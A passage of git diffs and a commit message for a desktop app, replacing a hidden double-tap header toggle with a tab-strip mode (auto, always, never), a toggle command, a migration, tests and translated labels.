unregistered pane is on auto and would render none. + tabStrip: 'always', type: 'group' } } diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx index 8f269dc1a7..fa5fca4e51 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx @@ -28,6 +28,7 @@ import { import { ContribBoundary, ContribRender } from '@/contrib/react/boundary' import { useContributions } from '@/contrib/react/use-contributions' import { useI18n } from '@/i18n' +import { useKeybindHint } from '@/lib/keybinds/use-keybind-hint' import { cn } from '@/lib/utils' import { $layoutEditMode } from '../../edit-mode' @@ -58,8 +59,8 @@ import { restoreTreePane, SESSION_TILE_DRAG, setStripTabHidden, - setTreeGroupHeaderHidden, setTreeGroupMinimized, + setTreeGroupTabStrip, treeTabCloseTargets } from '../store' import { @@ -71,8 +72,8 @@ import { toggleTabSelected } from '../tab-selection' -import { type DoubleTapContext, startPaneDrag } from './drag-session' -import { forceLoneHeaderForPanes } from './lone-header' +import { startPaneDrag } from './drag-session' +import { tabStripVisibleForZone } from './strip-visibility' import { useActiveTabVisible } from './tab-strip-scroll' import { paneChrome } from './track-model' @@ -85,9 +86,9 @@ function ZoneMenu({ children, closable, minimizable = true, - headerHidden, minimized, nodeId, + stripVisible, targetPane }: { children: ReactNode @@ -97,9 +98,11 @@ function ZoneMenu({ /** False for the zone hosting the uncloseable workspace — collapsing the * MAIN pane strands the app behind a strip. */ minimizable?: boolean - headerHidden?: boolean minimized?: boolean nodeId: string + /** Whether the strip is on screen — the Hide/Show row toggles against what + * the user can see, not against the stored mode (a zone on auto has none). */ + stripVisible?: boolean /** The right-clicked chip (else the active pane) — what the close-others / * to-the-right / all verbs measure from. Called when the menu RENDERS, not * on every zone re-render: resolving the siblings reads the layout tree, @@ -108,6 +111,10 @@ function ZoneMenu({ targetPane: () => string }) { const { t } = useI18n() + // Hiding the strip takes this menu with it, so the row that hides it is the + // last place to say how to get it back — the status bar's hide row does the + // same for the same reason. + const toggleHint = useKeybindHint('view.toggleTabStrip') // Resolved at render: the menu mounts on open, after the right-click set // menuPane — so an uncloseable target hides Close instead of offering a @@ -157,9 +164,17 @@ function ZoneMenu({ })()} {renderActionItem(kit, { - icon: headerHidden ? 'eye' : 'eye-closed', - label: headerHidden ? t.zones.showHeader : t.zones.hideHeader, - onSelect: () => setTreeGroupHeaderHidden(nodeId, !headerHidden) + icon: stripVisible ? 'eye-closed' : 'eye', + key: 'zone-tabstrip', + label: ( + <> + {/* The hint's `ml-auto` makes the label the row's flexible part, + so without this it breaks mid-phrase before the menu widens. */} + {stripVisible ? t.zones.hideTabStrip : t.zones.showTabStrip} + {toggleHint && {toggleHint}} + + ), + onSelect: () => setTreeGroupTabStrip(nodeId, stripVisible ? 'never' : 'always') })} {minimizable && renderActionItem(kit, { @@ -256,23 +271,17 @@ export function TreeGroup({ const paneLifecycle = lifecycleRef.current.entries const keptPanes = shown.filter(id => paneLifecycle[id] && paneLifecycle[id].lifecycle !== 'parked') - // ONE header style: the app's compact pane-header. DEFAULT is contextual — - // a single pane isn't a "tab", so its header auto-hides; a stack shows its - // chips. EXCEPTIONS force a lone pane to keep its header (tab + close X): - // - a TILE (closeable, placement 'main' — a session/page split), else a - // tile in its own zone is unclosable (the "3rd tile has no tab" trap); - // - a TOOL PANEL (terminal/logs — a collapse pane) dragged out of the main - // stack, else it's a dead zone with no tab to grab or ✕ to close. - // The uncloseable workspace and side chrome (sessions/files) keep the clean - // no-tab default. Double-click toggles it either way; a minimized group - // always shows its header (it IS the header). - // Session-tile ids force the header even before chrome registers — cycling - // onto a freshly-split tile used to land headerless ("name card missing"). - const forceLoneHeader = forceLoneHeaderForPanes(shown, id => paneChrome(paneFor(id)), isCollapsePane) - - // A full-page view (headerVeto) suppresses the strip while it's the active - // pane — a page is not a tab-able surface; the bar returns with the chat. - const headerHidden = paneChrome(active).headerVeto || (node.headerHidden ?? (shown.length <= 1 && !forceLoneHeader)) + // ONE header style: the app's compact pane-header. Whether this zone shows + // it is the resolver's call, not this component's — see strip-visibility.ts + // for the precedence. The same resolver answers for the toggle command, so + // the keystroke and the screen always agree about which way "toggle" points. + const stripVisible = tabStripVisibleForZone({ + active: activeId, + isCollapsePane, + mode: node.tabStrip, + paneFor, + shown + }) // A group collapses ALONG its parent split's axis. In a row that means the // WIDTH collapses — a full-width horizontal header would strand a tall @@ -280,7 +289,8 @@ export function TreeGroup({ // (tabs reading top-to-bottom). In a column (stacked zones) the horizontal // header IS the collapsed form, exactly as before. const verticalCollapse = Boolean(node.minimized) && parentAxis === 'row' && !isEmpty - const headerVisible = !isEmpty && !verticalCollapse && (Boolean(node.minimized) || !headerHidden) + // A minimized group IS its header, so it shows one regardless. + const headerVisible = !isEmpty && !verticalCollapse && (Boolean(node.minimized) || stripVisible) // Keep the activated tab — and, on the last one, the trailing "+" — inside // the strip's scroll window. Opening a tab past the right edge otherwise @@ -291,18 +301,6 @@ export function TreeGroup({ tabCount: shown.length }) - // The STRIP background owns the synthesized double-tap hide — it is the - // documented explicit gesture (model.ts). TABS never carry it: a tab is - // where people double-click for mundane reasons (select a title, retry a - // click), so tab presses pass no double-tap context and stay activate-only. - const hideHeaderDoubleTap: DoubleTapContext = { - key: `hide-header-${node.id}`, - onDoubleTap: () => { - setTreeGroupMinimized(node.id, false) - setTreeGroupHeaderHidden(node.id, true) - } - } - // Zone-menu close targets read the layout tree, but this component must NOT // subscribe to it: `useStore($layoutTree)` here wires every zone — and // therefore every mounted pane and its whole transcript — to the entire @@ -349,19 +347,13 @@ export function TreeGroup({ // Same menu on the header strip and the edit veil — one prop bag. const zoneMenu = { closable, - headerHidden, minimizable, minimized: node.minimized, nodeId: node.id, + stripVisible, targetPane } - // NO body double-click toggle: virtualized content (the thread) recreates - // its nodes between clicks, so the gesture was hopelessly unreliable. The - // bar's lifecycle is explicit instead — gaining a tab sticky-shows it - // (insertAtGroup pins headerHidden false), the main tab's context menu - // hides it, and full-page views veto it via paneChrome.headerVeto. - return (
// Tap the header to collapse to it / expand back — the DetailPane - // / sidebar-section gesture (never for the main zone). The - // double-tap hide rides the strip background below, not the tabs. - // Drag still moves the pane. - startPaneDrag( - activeId, - e, - () => minimizable && toggleCollapse(), - undefined, - hideHeaderDoubleTap, - active?.title ?? activeId - ) + // / sidebar-section gesture (never for the main zone). Drag still + // moves the pane. No double-tap hide belongs here: hiding the + // strip unmounts every affordance the zone has, including the + // menu offering "Show", so it stays a named command. + startPaneDrag(activeId, e, () => minimizable && toggleCollapse(), undefined, active?.title ?? activeId) } ref={stripRef} style={{ cursor: 'grab' }} @@ -547,7 +533,6 @@ export function TreeGroup({ e, onTap, stripRef.current ? { groupId: node.id, strip: stripRef.current } : undefined, - undefined, t.zones.tabCount(dragSelection.length), dragSelection ) @@ -565,7 +550,6 @@ export function TreeGroup({ e, onTap, stripRef.current ? { groupId: node.id, strip: stripRef.current } : undefined, - undefined, title ) } @@ -681,7 +665,7 @@ export function TreeGroup({ // barely-tinted wash; the light blur reads as "edit mode" the same // way the zone editor's backdrop does. className="absolute inset-x-0 bottom-0 z-50 flex cursor-grab items-center justify-center outline-1 -outline-offset-2 outline-dashed backdrop-blur-[2px]" - onPointerDown={e => startPaneDrag(activeId, e, undefined, undefined, undefined, active?.title ?? activeId)} + onPointerDown={e => startPaneDrag(activeId, e, undefined, undefined, active?.title ?? activeId)} style={{ top: headerVisible ? 28 : 0, background: diff --git a/apps/desktop/src/components/pane-shell/tree/store.ts b/apps/desktop/src/components/pane-shell/tree/store.ts index de8b00395f..ffb6016225 100644 --- a/apps/desktop/src/components/pane-shell/tree/store.ts +++ b/apps/desktop/src/components/pane-shell/tree/store.ts @@ -27,6 +27,7 @@ import { isLayoutNode, type LayoutNode, mergeZonesWithPane as mergeZonesWithPaneOp, + migratePersistedTree, mirrorTreeHorizontal, movePane as movePaneOp, movePanes as movePanesOp, @@ -34,12 +35,14 @@ import { removePane, reorderPanesInGroup as reorderPanesInGroupOp, setActivePane as setActivePaneOp, - setGroupHeaderHidden as setGroupHeaderHiddenOp, setGroupMinimized, + setGroupTabStrip as setGroupTabStripOp, setSplitWeights as setSplitWeightsOp, - type SplitNode + type SplitNode, + type TabStripMode } from './model' import { FLOATING_PLACEMENT } from './renderer/floating-rect' +import { tabStripVisibleForZone } from './renderer/strip-visibility' import { rootChildSide } from './renderer/track-model' // v2: v1 trees were saved against placeholder panes with index-order zone @@ -53,9 +56,10 @@ let defaultTree: LayoutNode | null = null function loadPersisted(): LayoutNode | null { const parsed = readJson(STORAGE_KEY) - // Canonicalize on load: strips stale attributes older code persisted - // (e.g. explicit headerHidden on lone-pane zones) and re-flattens. - return isLayoutNode(parsed) ? normalize(parsed) : null + // Canonicalize on load: bring attributes onto the current schema (see + // migratePersistedTree — the retired `headerHidden` is dropped here) and + // re-flatten the structure. + return isLayoutNode(parsed) ? normalize(migratePersistedTree(parsed)) : null } function persist(tree: LayoutNode | null) { @@ -715,6 +719,22 @@ function shownPanesInGroup(group: { panes: readonly string[] }): string[] { }) } +/** Is this zone showing a tab strip right now? The store's adapter over the + * shared resolver — TreeGroup answers the same question from its own render + * inputs, so the toggle command and the strip on screen cannot disagree about + * which way "toggle" points. */ +export function tabStripVisibleForGroup(group: GroupNode): boolean { + const registered = registry.getArea('panes') + + return tabStripVisibleForZone({ + active: group.active, + isCollapsePane, + mode: group.tabStrip, + paneFor: (id: string) => registered.find(c => c.id === id), + shown: shownPanesInGroup(group) + }) +} + /** ⌘1…⌘9: activate the Nth *visible* tab of the target zone — the first of * hovered / focused / workspace that is a real tab strip (≥2 shown panes). * Pointing at the sidebar (or nothing) therefore still switches main's tabs @@ -761,13 +781,11 @@ export function cycleTreeTabInFocusedZone(direction: 1 | -1): null | string { const nextId = panes[(idx + direction + panes.length) % panes.length] activateTreePane(group.id, nextId) - // Cycling onto a session/main tab must surface the name card — a zone that - // was double-tap-hidden stays headerless otherwise ("the one that cycles - // never gets it"). - if (isMainStripPane(nextId)) { - setTreeGroupHeaderHidden(group.id, false) - } - + // No strip repair here: cycling needs two shown tabs, which is exactly when + // auto shows a strip anyway. The old force-show existed because a stray + // double-tap could leave a multi-tab zone headerless; that gesture is gone, + // and a zone the user deliberately set to `never` must not be argued with by + // a keystroke that was only asked to change tabs. return nextId } @@ -1262,16 +1280,11 @@ function enforceDockedPanes( } if (dock.pos === 'center' && from.id === anchor.id) { - // Already stacked with its anchor — but an enforced tab must be - // REACHABLE, not just co-located. Community regression (Aug 2026): - // persisted trees where the enforced pane was center-stacked with the - // strip hidden and itself active left the ANCHOR invisible with no - // strip to switch back ("my ui only shows bots now... cant find the - // sessions"). An enforced zone always shows its strip. - if (anchor.headerHidden === true) { - next = setGroupHeaderHiddenOp(next, anchor.id, false) ?? next - } - + // Already stacked with its anchor, and nothing to repair: the trees that + // produced the "my ui only shows bots now... cant find the sessions" + // regression carried an accidental `headerHidden: true`, which the load + // migration now drops outright. A surviving `never` here is deliberate + // and recoverable from the toggle command, so boot does not overrule it. continue } @@ -1354,14 +1367,14 @@ function adoptContributedPanes(): void { const target = findGroupOfPane(next, anchor ?? '')?.id if (target) { - // Whether the DESTINATION zone's header was explicitly hidden, read - // BEFORE the insert — `insertAtGroup` pins `headerHidden: false` on a - // center drop (a stack you can't see is a trap), which is right for a - // drag but wrong for adoption into a zone whose bar the user hid. - const hostHeaderHidden = findGroup(next, target)?.headerHidden === true - // Silent adoption: don't front over the zone's active tab — a reveal // does. An edge dock re-takes the share the pane held when it closed. + // + // Nothing writes the strip choice afterwards. This used to read the + // host's hidden flag before the insert and stamp it back on after, purely + // to undo the pin `insertAtGroup` applied; with the pin gone the zone's + // own preference simply survives, and the adopted pane arrives with a + // chip whenever auto says the zone has more than one. next = insertAtGroup( next, @@ -1372,20 +1385,6 @@ function adoptContributedPanes(): void { false, recalledEdgeWeights(pane.id) ) ?? next - - // An adopted pane ARRIVES with its chip showing — a surprise zone with - // zero chrome has no obvious handle to drag or close. (Explicit reveal; - // the next structural op returns lone panes to the auto-hide default.) - // - // EXCEPT into a zone whose header the user explicitly hid: that's a - // standing preference about the zone, not a stale default. Without this - // the bar came back every time a tool panel was closed and toggled on - // again — Close dismisses the pane, the toggle re-adopts it through here. - const landed = findGroupOfPane(next, pane.id) - - if (landed) { - next = setGroupHeaderHiddenOp(next, landed.id, hostHeaderHidden) - } } } @@ -1846,15 +1845,50 @@ export function collapseTreePane(paneId: string) { } } -/** Hide/show a zone's header entirely (double-click gesture). */ -export function setTreeGroupHeaderHidden(groupId: string, headerHidden: boolean) { +/** Write a zone's standing tab-strip choice; `undefined` returns it to auto. */ +export function setTreeGroupTabStrip(groupId: string, tabStrip: TabStripMode | undefined) { const tree = $layoutTree.get() if (tree) { - commit(setGroupHeaderHiddenOp(tree, groupId, headerHidden)) + commit(setGroupTabStripOp(tree, groupId, tabStrip)) } } +/** + * The zone `view.toggleTabStrip` and its ⌘K row act on: the first of hovered / + * focused / workspace that renders panes at all. Deliberately the widest + * eligibility of any tab verb — the whole point of the command is to reach a + * zone showing no chrome, so it must not require the chrome it restores. + */ +const tabStripTargetGroup = () => tabTargetGroup(candidate => shownPanesInGroup(candidate).length > 0) + +/** Is the toggle's target zone currently showing a strip? Null when no zone + * qualifies — the ⌘K row reads this to describe what pressing it will do. */ +export function targetZoneTabStripVisible(): boolean | null { + const group = tabStripTargetGroup() + + return group ? tabStripVisibleForGroup(group) : null +} + +/** Flip the target zone's strip. Returns the mode written, or null when there + * was no zone to act on. */ +export function toggleTargetZoneTabStrip(): TabStripMode | null { + const group = tabStripTargetGroup() + + if (!group) { + return null + } + + // Toggle against what is ON SCREEN, not against the stored mode: a zone on + // auto has no stored mode, and "toggle" means "do the other thing to what I + // am looking at". Both outcomes are explicit, so the zone leaves auto either + // way rather than drifting with its tab count afterwards. + const next: TabStripMode = tabStripVisibleForGroup(group) ? 'never' : 'always' + setTreeGroupTabStrip(group.id, next) + + return next +} + export function setTreeSplitWeights(splitId: string, weights: number[]) { const tree = $layoutTree.get() diff --git a/apps/desktop/src/components/pane-shell/tree/tabstrip-migration.test.ts b/apps/desktop/src/components/pane-shell/tree/tabstrip-migration.test.ts new file mode 100644 index 0000000000..31b2f173ee --- /dev/null +++ b/apps/desktop/src/components/pane-shell/tree/tabstrip-migration.test.ts @@ -0,0 +1,60 @@ +import { describe, expect, it } from 'vitest' + +import { type LayoutNode, migratePersistedTree } from './model' + +// A stored `headerHidden: true` is ambiguous — a deliberate "Hide header" and +// an accidental double-tap wrote the same byte — and it is the state people got +// stuck in, because hiding removed the only control offering to unhide. The +// migration therefore drops it rather than translating it to `tabStrip: 'never'`. + +const persisted = (node: unknown) => migratePersistedTree(node as LayoutNode) as never as Record + +describe('migratePersistedTree', () => { + it('returns a hidden zone to auto instead of re-stranding it', () => { + const migrated = persisted({ + active: 'workspace', + headerHidden: true, + id: 'g', + panes: ['workspace'], + type: 'group' + }) + + expect(migrated.headerHidden).toBeUndefined() + expect(migrated.tabStrip).toBeUndefined() + expect(migrated.panes).toEqual(['workspace']) + }) + + it('drops a stored false too — the repair paths wrote most of them, not users', () => { + expect(persisted({ headerHidden: false, id: 'g', panes: ['workspace'], type: 'group' }).tabStrip).toBeUndefined() + }) + + it('keeps a tabStrip choice, which only a user can have written', () => { + expect(persisted({ id: 'g', panes: ['workspace'], tabStrip: 'never', type: 'group' }).tabStrip).toBe('never') + expect(persisted({ id: 'g', panes: ['workspace'], tabStrip: 'always', type: 'group' }).tabStrip).toBe('always') + }) + + it('discards a tabStrip value outside the schema', () => { + expect(persisted({ id: 'g', panes: ['workspace'], tabStrip: 'sometimes', type: 'group' }).tabStrip).toBeUndefined() + }) + + it('reaches groups nested in splits', () => { + const migrated = persisted({ + children: [ + { active: 'workspace', headerHidden: true, id: 'a', panes: ['workspace'], type: 'group' }, + { + children: [{ headerHidden: true, id: 'b', panes: ['terminal'], type: 'group' }], + id: 'inner', + orientation: 'column', + type: 'split', + weights: [1] + } + ], + id: 'root', + orientation: 'row', + type: 'split', + weights: [1, 1] + }) + + expect(JSON.stringify(migrated)).not.toContain('headerHidden') + }) +}) diff --git a/apps/desktop/src/components/pane-shell/tree/tool-pane-toggle.test.ts b/apps/desktop/src/components/pane-shell/tree/tool-pane-toggle.test.ts index e8dac0adb7..f536b4776a 100644 --- a/apps/desktop/src/components/pane-shell/tree/tool-pane-toggle.test.ts +++ b/apps/desktop/src/components/pane-shell/tree/tool-pane-toggle.test.ts @@ -14,7 +14,7 @@ import { closeToolPane, isPaneVisible, revealTreePane, - setTreeGroupHeaderHidden, + setTreeGroupTabStrip, togglePaneVisible } from './store' @@ -69,7 +69,7 @@ const toolZone = () => { ? tree.children.find(c => c.type === 'group' && (c.panes.includes('terminal') || c.panes.includes('logs'))) : null - return found as { active?: string; headerHidden?: boolean; minimized?: boolean; panes: string[] } | null + return found as { active?: string; minimized?: boolean; panes: string[]; tabStrip?: string } | null } /** Terminal dragged to the bottom; logs adopted into the same zone. @@ -77,13 +77,13 @@ const toolZone = () => { * Set via `$layoutTree.set`, NOT `declareDefaultTree` — that only adopts into * an existing tree, and `$layoutTree` is module state that survives between * tests, so the second case would silently assert against the first's shape. */ -const stackTree = (options?: { active?: string; headerHidden?: boolean }) => { +const stackTree = (options?: { active?: string; tabStrip?: 'always' | 'never' }) => { $layoutTree.set( split('column', [ group(['workspace'], { active: 'workspace', id: 'grp-main' }), group(['terminal', 'logs'], { active: options?.active ?? 'terminal', - headerHidden: options?.headerHidden, + tabStrip: options?.tabStrip, id: 'g-tools' }) ]) @@ -363,23 +363,23 @@ describe('a terminal that owns its own zone (Default / Terminal deck / Quad)', ( describe('a zone whose header the user hid', () => { it('keeps it hidden after a stacked sibling is closed and toggled back', () => { - stackTree({ headerHidden: true }) + stackTree({ tabStrip: 'never' }) bindPaneCollapse('terminal', atom(true)) const $logs = atom(true) bindPaneCollapse('logs', $logs) - setTreeGroupHeaderHidden('g-tools', true) + setTreeGroupTabStrip('g-tools', 'never') // Close logs: the zone drops to one pane. normalize used to DISCARD the // hidden flag here ("a lone zone is headerless anyway"), so the bar // reappeared the moment logs was toggled back in. closeToolPane('logs') - expect(toolZone()?.headerHidden).toBe(true) + expect(toolZone()?.tabStrip).toBe('never') $logs.set(true) expect(toolZone()?.panes).toContain('logs') - expect(toolZone()?.headerHidden).toBe(true) + expect(toolZone()?.tabStrip).toBe('never') }) it('keeps it hidden when a closed pane is re-adopted into it', () => { @@ -388,14 +388,14 @@ describe('a zone whose header the user hid', () => { bindPaneCollapse('terminal', $terminal) bindPaneCollapse('logs', atom(true)) - setTreeGroupHeaderHidden('g-tools', true) + setTreeGroupTabStrip('g-tools', 'never') - // Re-adoption pins headerHidden:false so a surprise pane always has a - // handle — correct for a new pane, wrong for a zone the user hid. + // Re-adoption used to pin the strip visible so a surprise pane always had + // a handle — correct for a new pane, wrong for a zone the user hid. closeToolPane('terminal') $terminal.set(true) expect(toolZone()?.panes).toContain('terminal') - expect(toolZone()?.headerHidden).toBe(true) + expect(toolZone()?.tabStrip).toBe('never') }) }) diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index 024cecf53c..d59c83f71f 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -2345,8 +2345,8 @@ export const ar = defineLocale({ } }, zones: { - showHeader: 'إظهار الرأس', - hideHeader: 'إخفاء الرأس', + showTabStrip: 'إظهار علامات التبويب', + hideTabStrip: 'إخفاء علامات التبويب', showStripTab: title => `إظهار ${title}`, hideStripTab: title => `إخفاء ${title}`, lastTabKeptTitle: 'يبقى آخر تبويب', diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 66fcc36c9f..0ebe1d94bb 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -2980,8 +2980,8 @@ export const en: Translations = { }, zones: { - showHeader: 'Show header', - hideHeader: 'Hide header', + showTabStrip: 'Show tabs', + hideTabStrip: 'Hide tabs', showStripTab: title => `Show ${title}`, hideStripTab: title => `Hide ${title}`, lastTabKeptTitle: 'Last tab stays', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index 64ea8ed2f9..de86d2e0bd 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -2636,8 +2636,8 @@ export const ja = defineLocale({ }, zones: { - showHeader: 'ヘッダーを表示', - hideHeader: 'ヘッダーを隠す', + showTabStrip: 'タブを表示', + hideTabStrip: 'タブを隠す', showStripTab: title => `${title} を表示`, hideStripTab: title => `${title} を隠す`, lastTabKeptTitle: '最後のタブは残ります', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index 2bdbcf0936..5716503fb7 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -2554,8 +2554,8 @@ export interface Translations { } zones: { - showHeader: string - hideHeader: string + showTabStrip: string + hideTabStrip: string showStripTab: (title: string) => string hideStripTab: (title: string) => string lastTabKeptTitle: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index a3930085d4..2c3513f09b 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -2549,8 +2549,8 @@ export const zhHant = defineLocale({ }, zones: { - showHeader: '顯示標題列', - hideHeader: '隱藏標題列', + showTabStrip: '顯示分頁', + hideTabStrip: '隱藏分頁', showStripTab: title => `顯示 ${title}`, hideStripTab: title => `隱藏 ${title}`, lastTabKeptTitle: '保留最後一個分頁', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 0fa9e21e22..db8866b7e3 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -3147,8 +3147,8 @@ export const zh: Translations = { }, zones: { - showHeader: '显示标题栏', - hideHeader: '隐藏标题栏', + showTabStrip: '显示标签', + hideTabStrip: '隐藏标签', showStripTab: title => `显示 ${title}`, hideStripTab: title => `隐藏 ${title}`, lastTabKeptTitle: '保留最后一个标签', diff --git a/apps/desktop/src/store/tabstrip-prefs.ts b/apps/desktop/src/store/tabstrip-prefs.ts new file mode 100644 index 0000000000..64d922fa40 --- /dev/null +++ b/apps/desktop/src/store/tabstrip-prefs.ts @@ -0,0 +1,38 @@ +import type { TabStripMode } from '@/components/pane-shell/tree/model' +import { type Codec, persistentAtom } from '@/lib/persisted' + +const TAB_STRIP_DEFAULT_STORAGE_KEY = 'hermes.desktop.tabStripDefault' + +/** What a zone does when it has made no choice of its own. */ +export type TabStripDefault = 'auto' | TabStripMode + +const codec: Codec = { + decode: raw => (raw === 'always' || raw === 'never' ? raw : 'auto'), + encode: value => (value === 'auto' ? null : value) +} + +/** + * The app-wide answer for zones on auto, VS Code's `workbench.editor.showTabs` + * and Zed's `tab_bar.show`. `auto` keeps the contextual rule (a lone pane is + * not a tab); the other two are for people who want one answer everywhere + * rather than a per-zone choice they have to repeat. + * + * A zone that states its own preference still wins — this is the fallback, not + * an override — and neither value can strand a pane (see resolveTabStripVisible). + */ +export const $tabStripDefault = persistentAtom(TAB_STRIP_DEFAULT_STORAGE_KEY, 'auto', codec) + +export function setTabStripDefault(value: TabStripDefault) { + $tabStripDefault.set(value) +} + +/** The mode a zone resolves against: its own choice, else the app default. */ +export function effectiveTabStripMode(zoneMode: TabStripMode | undefined): TabStripMode | undefined { + if (zoneMode) { + return zoneMode + } + + const fallback = $tabStripDefault.get() + + return fallback === 'auto' ? undefined : fallback +} From 272b007f8c1295cd7a0e9d58002fd75f9f867340 Mon Sep 17 00:00:00 2001 From: Brooklyn Nicholson Date: Fri, 21 Aug 2026 13:25:29 -0500 Subject: [PATCH 028/161] feat(desktop): give hiding the tab strip a command, and a way back MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The strip could only be hidden by an undiscoverable double-tap, and once hidden the zone had no chrome left to click — no tab, no ✕, no menu holding "Show". This puts it on the same footing as the status bar, whose hide has never stranded anyone: ⌥⌘T, a ⌘K row, the shell context menu, and the zone menu, which now prints the keystroke on the row that takes the strip away so the way back is stated at the moment it matters. All four resolve their target zone the same way the other tab verbs do (hovered, else focused, else the workspace) and describe themselves from what is on screen rather than from a stored value, so "toggle" always means the opposite of what the user is looking at. Adds an app-wide default alongside it, in Appearance next to Session List Density — auto, always, or never, matching VS Code's `workbench.editor.showTabs` and Zed's `tab_bar.show` for people who want one answer everywhere instead of a per-zone choice they repeat. A zone that has stated its own preference still wins, and neither value can strand a pane. --- .../src/app/context-menu/app-context-menu.tsx | 10 ++++++++ apps/desktop/src/app/contrib/controller.tsx | 16 ++++++++++++- apps/desktop/src/app/hooks/use-keybinds.ts | 4 +++- .../src/app/settings/appearance-settings.tsx | 23 +++++++++++++++++++ apps/desktop/src/i18n/en.ts | 6 +++++ apps/desktop/src/i18n/ja.ts | 5 ++++ apps/desktop/src/i18n/types.ts | 5 ++++ apps/desktop/src/i18n/zh-hant.ts | 5 ++++ apps/desktop/src/i18n/zh.ts | 6 +++++ apps/desktop/src/lib/icons.ts | 2 ++ apps/desktop/src/lib/keybinds/actions.ts | 6 +++++ 11 files changed, 86 insertions(+), 2 deletions(-) diff --git a/apps/desktop/src/app/context-menu/app-context-menu.tsx b/apps/desktop/src/app/context-menu/app-context-menu.tsx index 17ca30fa38..afe4ce62ab 100644 --- a/apps/desktop/src/app/context-menu/app-context-menu.tsx +++ b/apps/desktop/src/app/context-menu/app-context-menu.tsx @@ -4,6 +4,7 @@ import { useEffect } from 'react' import { useNavigate } from 'react-router' import { terminalMenuHandleFor } from '@/app/right-sidebar/terminal/terminal-context-menu' +import { toggleTargetZoneTabStrip } from '@/components/pane-shell/tree/store' import { Codicon } from '@/components/ui/codicon' import { HERMES_CONTEXT_MENU_TRIGGER_ATTR } from '@/components/ui/context-menu' import { writeClipboardText } from '@/components/ui/copy-button' @@ -566,6 +567,15 @@ function shellSections({ navigate, t }: ShellVerbs): ReactNode[][] { label={t.keybinds.actions['view.toggleStatusbar']} onSelect={toggleStatusbarVisible} />, + // The pointer-only way back to a hidden tab strip: right-clicking the + // shell reaches this menu from anywhere, including a zone that has no + // chrome left to right-click. + void toggleTargetZoneTabStrip()} + />, $statusbarVisible.get(), set: enabled => $statusbarVisible.set(enabled) }), + paletteToggle({ + id: 'view.toggleTabStrip', + label: 'Toggle tabs', + action: 'view.toggleTabStrip', + icon: PanelTop, + keywords: ['tab strip', 'tab bar', 'tabs', 'header', 'zone', 'hide', 'show', 'chrome'], + // On-screen truth for the zone the verbs target, not a stored flag: a zone + // on auto has no stored value, and the row must read as "what pressing + // this does to what I can see". + get: () => Boolean(targetZoneTabStripVisible()), + set: () => void toggleTargetZoneTabStrip() + }), // The keybind panel's non-titlebar door (the keyboard icon is gone). { id: 'keybinds.panel', diff --git a/apps/desktop/src/app/hooks/use-keybinds.ts b/apps/desktop/src/app/hooks/use-keybinds.ts index caa0f9d7bc..b4a525acf4 100644 --- a/apps/desktop/src/app/hooks/use-keybinds.ts +++ b/apps/desktop/src/app/hooks/use-keybinds.ts @@ -11,7 +11,8 @@ import { cycleTreeTabInFocusedZone, isPaneVisible, layoutHasRootSide, - togglePaneVisible + togglePaneVisible, + toggleTargetZoneTabStrip } from '@/components/pane-shell/tree/store' import { onReleaseTypingFocus } from '@/components/ui/keyboard-first' import { findBarClaimsCombo } from '@/lib/find-in-page' @@ -245,6 +246,7 @@ export function useKeybinds(deps: KeybindRuntimeDeps): void { layoutHasRootSide('right') ? toggleFileBrowserOpen() : togglePaneVisible('terminal'), 'view.toggleReview': toggleReview, 'view.toggleStatusbar': toggleStatusbarVisible, + 'view.toggleTabStrip': () => void toggleTargetZoneTabStrip(), 'view.showFiles': showFiles, 'view.showBrowser': openBrowserTab, 'view.toggleHud': () => toggleHud(hudTargetSessionId()), diff --git a/apps/desktop/src/app/settings/appearance-settings.tsx b/apps/desktop/src/app/settings/appearance-settings.tsx index b677ae069f..bd31f043fd 100644 --- a/apps/desktop/src/app/settings/appearance-settings.tsx +++ b/apps/desktop/src/app/settings/appearance-settings.tsx @@ -21,6 +21,7 @@ import { $activeGatewayProfile, $profiles, normalizeProfileKey } from '@/store/p import { $reactionsEnabled, setReactionsEnabled } from '@/store/reactions-enabled' import { $reasoningCollapsedByDefault, setReasoningCollapsedByDefault } from '@/store/reasoning-disclosure' import { $sessionListDensity, type SessionListDensity, setSessionListDensity } from '@/store/session-list-density' +import { $tabStripDefault, setTabStripDefault, type TabStripDefault } from '@/store/tabstrip-prefs' import { $toolViewMode, setToolViewMode } from '@/store/tool-view' import { $translucency, @@ -345,6 +346,7 @@ export function AppearanceSettings() { const toolViewMode = useStore($toolViewMode) const reasoningCollapsedByDefault = useStore($reasoningCollapsedByDefault) const sessionListDensity = useStore($sessionListDensity) + const tabStripDefault = useStore($tabStripDefault) const zoomPercent = useStore($zoomPercent) const embedMode = useStore($embedMode) const embedAllowed = useStore($embedAllowed) @@ -423,6 +425,12 @@ export function AppearanceSettings() { { id: 'detailed', label: a.sessionDensityDetailed } ] as const satisfies readonly { id: SessionListDensity; label: string }[] + const tabStripOptions = [ + { id: 'auto', label: a.tabStripAuto }, + { id: 'always', label: a.tabStripAlways }, + { id: 'never', label: a.tabStripNever } + ] as const satisfies readonly { id: TabStripDefault; label: string }[] + const embedOptions = [ { id: 'ask', label: a.embedsAsk }, { id: 'always', label: 